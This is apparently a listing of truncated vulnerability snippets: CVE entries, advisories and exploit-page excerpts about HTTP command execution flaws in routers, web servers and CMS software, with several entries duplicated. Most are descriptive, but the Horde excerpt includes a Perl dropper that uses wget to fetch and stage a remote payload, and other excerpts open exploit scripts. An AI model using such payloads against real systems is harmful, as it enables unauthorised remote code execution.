CVE-2020-4212

IBM Spectrum Protect Plus 10.1.0 and 10.1.5 could allow a remote attacker to execute arbitrary code on the system. By using a specially crafted HTTP command, an attacker could exploit this vulnerability to execute arbitrary command on the system. IBM X-Force ID: 175023...

CVE-2019-12489

An issue was discovered on Fastweb Askey RTV1907VW 0.00.81FW200Askey 2018-10-02 18:08:18 devices. By using the usbremove service through an HTTP request, it is possible to inject and execute a command between two & characters in the mount parameter...

CVE-2019-14334

An issue was discovered on D-Link 6600-AP, DWL-3600AP, and DWL-8610AP Ax 4.2.0.14 21/03/2019 devices. There is post-authenticated Certificate and RSA Private Key extraction through an insecure sslcert-get.cgi HTTP command...

CVE-2019-14334

An issue was discovered on D-Link 6600-AP, DWL-3600AP, and DWL-8610AP Ax 4.2.0.14 21/03/2019 devices. There is post-authenticated Certificate and RSA Private Key extraction through an insecure sslcert-get.cgi HTTP command...

SAPIDO RB-1732 - Remote Command Execution Exploit

Exploit Title: SAPIDO RB-1732 command line execution Exploit Author: k1nm3n.aotoi Vendor Homepage: http://www.sapido.com.tw/ Software Link: http://www.sapido.com.tw/CH/data/Download/firmware/rb1732/tc/RB-1732TCv2.0.43.bin Version: RB-1732 V2.0.43 Tested on: linux import requests import sys def...

Siemens SCALANCE X200 IRT Switches < 5.1.0 HTTP Command Execution

Binary data 720037.prm...

CVE-2018-17066

An issue was discovered on D-Link DIR-816 A2 1.10 B05 devices. An HTTP request parameter is used in command string construction in the handler function of the /goform/form2systime.cgi route. This could lead to command injection via shell metacharacters in the datetime parameter...

PT-2018-3918 · D Link · D-Link Di-604 +1

Name of the Vulnerable Software and Affected Versions: D-Link DIR-550A versions through v2.10KR D-Link DIR-604M versions through v2.10KR Description: The issue allows a malicious user to forge an HTTP request and inject operating system commands that can be executed on the device with higher...

CVE-2014-8888

The remote administration interface in D-Link DIR-815 devices with firmware before 2.03.B02 allows remote attackers to execute arbitrary commands via vectors related to an "HTTP command injection issue."...

CVE-2014-8888

The remote administration interface in D-Link DIR-815 devices with firmware before 2.03.B02 allows remote attackers to execute arbitrary commands via vectors related to an "HTTP command injection issue."...

CVE-2014-8888

The CVE-2014-8888 entry maps to a vulnerability in D-Link DIR-815 devices (firmware prior to 2.03.B02) where the remote administration interface is susceptible to an HTTP command injection due to insufficient input validation. Affected component/process: the remote admin web interface; impact per...

The local file contains（LFI）vulnerability Detection Tool – Kadimus-vulnerability warning-the black bar safety net

Kadimus is for detecting a site local file inclusion（LFI）vulnerability of security tools. Characteristics Detect all URL parameters /var/log/auth. log RCE /proc/self/environ RCE php://input RCE data://text RCE The source code leak detection Multi-thread scanning HTTP command execution vulnerabili...

MDG Web Server 4D 3.6 HTTP Command Buffer Overflow Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/7479/info A buffer overflow vulnerability has been reported for MDG Web Server. The vulnerability exists when the web server attempts to process overly long HTTP requests. Specifically, when the web server processes a...

InstantCMS 1.6 - Remote PHP Code Execution

No description provided by source. require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initializeinfo = superupdateinfoinfo, 'Name' = 'InstantCMS 1.6 Remote PHP Code Execution', 'Description' = %q This module exploits an...

Horde Framework Unserialize PHP Code Execution

ported from metasploit by irrlicht june 2014 modify dropper url and run use strict; use warnings; use LWP::UserAgent; use WWW::Mechanize; use MIME::Base64; if !$ARGV0 print "specify full login.php url\n"; exit; my $dropper = 'system"mkdir /tmp/\" \"; cd /tmp/\" \"; wget -O deploy.pl...

Alchemy Eye HTTP Command Execution

Alchemy Eye and Alchemy Network Monitor are network management tools for Microsoft Windows. The product contains a built-in HTTP server for remote monitoring and control. This HTTP server allows arbitrary commands to be run on the server by a remote attacker. SPDX-FileCopyrightText: 2001 HD Moore...

CVE-2004-2516

Directory traversal vulnerability in myServer 0.7 allows remote attackers to list arbitrary directories via an HTTP GET command with a large number of "./" sequences followed by "../" sequences...

[Full-Disclosure] lftp buffer overflows

lftp buffer overflows --------------------- PROGRAM: lftp VENDOR: Alexander V. Lukyanov et al. HOMEPAGE: http://lftp.yar.ru/ VULNERABLE VERSIONS: 2.3.0, 2.4.9, 2.6.6, 2.6.7, 2.6.8, 2.6.9, probably all versions inbetween IMMUNE VERSIONS: 2.6.10, older versions with my patch applied PROGRAM...

LabVIEW Web Server DoS Vulnerability

... . ... . . .. .. .. . ... Title: LabVIEW Web Server DoS Vulnerability Date: 2002-04-22 Vendor: National Instruments Software: LabVIEW Web Server Versions: 5.1.1 - 6.1 Tested env: Windows 98, 2000; Linux. Impact: Malformed HTTP command crashes the LabVIEW Web Server, its LabVIEW application hos...